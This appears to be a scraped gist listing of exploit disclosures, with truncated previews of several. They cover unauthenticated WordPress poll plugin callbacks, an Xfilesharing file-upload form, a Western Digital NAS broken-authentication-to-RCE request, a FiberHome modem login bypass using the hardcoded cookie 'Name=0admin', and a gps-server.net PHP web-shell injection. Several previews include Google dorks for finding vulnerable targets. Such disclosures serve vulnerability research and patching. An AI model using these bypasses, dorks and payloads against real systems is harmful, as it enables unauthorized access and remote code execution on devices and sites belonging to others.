pak0s
/ Broken Authentication in Responsive Poll Wordpress Plugin 1.3.4.txt
Created
April 10, 2020 15:14
Broken Authentication in Responsive Poll Wordpress Plugin <=1.3.4
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| An attacker can call following functions as an unauthenticated user. | |
| TotalSoftPoll_Clone_Callback | |
| TotalSoftPoll_Del_Callback | |
| TotalSoftPoll_Edit_Callback | |
| TotalSoftPoll_Edit_Q_M_Callback | |
| TotalSoftPoll_Edit_Ans_Callback | |
| TotalSoftPoll_Theme_Clone_Callback | |
| TotalSoftPoll_Theme_Edit_Callback | |
| TotalSoftPoll_Theme_Edit1_Callback |
pak0s
/ Exploit-DB-Xfilesharing.txt
Created
November 14, 2019 04:57
Xfilesharing <=2.5.1 Arbitrary File Upload and Local File Inclusion
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Exploit Title: Xfilesharing <=2.5.1 Arbitrary File Upload and Local File Inclusion | |
| # Google Dork: inurl:/?op=registration | |
| # Date: 14th Nov, 2019 | |
| # Exploit Author: Noman Riffat | |
| # Vendor Homepage: https://sibsoft.net/xfilesharing.html | |
| # Version: <=2.5.1 | |
| # CVE : CVE-2019-18951, CVE-2019-18952 | |
| ##################### | |
| Arbitrary File Upload |
pak0s
/ xfilesharing.txt
Last active
May 13, 2020 01:27
Xfilesharing <=2.5.1 Arbitrary File Upload and Local File Inclusion
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ##################### | |
| Arbitrary File Upload | |
| ##################### | |
| <form action="http://xyz.com/cgi-bin/up.cgi" method="post" enctype="multipart/form-data"> | |
| <input type="text" name="sid" value="joe"> | |
| <input type="file" name="file"> | |
| <input type="submit" value="Upload" name="submit"> | |
| </form> |
pak0s
/ wd-exploit.txt
Last active
September 19, 2019 05:54
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Exploit Title: Western Digital My Book World II NAS <= 1.02.12 - Broken Authentication to RCE | |
| # Google Dork: intitle:"My Book World Edition - MyBookWorld" | |
| # Date: 19th Sep, 2019 | |
| # Exploit Author: Noman Riffat, National Security Services Group (NSSG) | |
| # Vendor Homepage: https://wd.com/ | |
| # Software Link: https://support.wdc.com/downloads.aspx?p=130&lang=en | |
| # Version: <= 1.02.12 | |
| # Tested on: Firmware | |
| # CVE : CVE-2019-16399 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| POST /admin/system_advanced.php?lang=en HTTP/1.1 | |
| Host: x.x.x.x | |
| User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0 | |
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | |
| Accept-Language: en-US,en;q=0.5 | |
| Accept-Encoding: gzip, deflate | |
| Content-Type: application/x-www-form-urlencoded | |
| Upgrade-Insecure-Requests: 1 | |
| Content-Length: 241 |
pak0s
/ FiberHome VDSL2 Modem HG 150-UB Login Bypass.txt
Created
April 3, 2018 13:42
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Exploit Title: FiberHome VDSL2 Modem HG 150-UB Login Bypass | |
| # Date: 04/03/2018 | |
| # Exploit Author: Noman Riffat | |
| # Vendor Homepage: http://www.fiberhome.com/ | |
| The vulnerability exists in plain text & hard coded cookie. Using any cookie manager extension, an attacker can bypass login page by setting the following Master Cookie. | |
| Cookie: Name=0admin | |
| Then access the homepage which will no longer require authentication. |
pak0s
/ gps-server.net SAAS CMS multiple vulnerabilities.txt
Last active
May 18, 2023 10:27
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1. Remote Code Injection in gps-server.net SAAS CMS (<=3.0) | |
| The writeLog function in fn_common.php in gps-server.net GPS Tracking Software (self hosted) through 3.0 allows remote attackers to inject arbitrary PHP code via a crafted request that is mishandled during admin log viewing, as demonstrated by | |
| <?php system($_GET[cmd]); ?> | |
| in a login request. Each POST request goes through mysql_real_escape_string() function which will add slashes behind quotes so the payload code shouldn't include any quote. The header of the file where code is injected allows only Admin to view the file which makes it less of a RCE. But there is another vulnerability (explained below) which allows an attacker to hijack account hence making the RCE exploitable with 100% success. | |
| 2. Admin Account Hijack in gps-server.net SAAS CMS (2.x) | |
| gps-server.net GPS Tracking Software (self hosted) 2.x has a password reset procedure that immediately resets passwords upon an unauthenticated request, and then sends e-mail with a predictable (date- |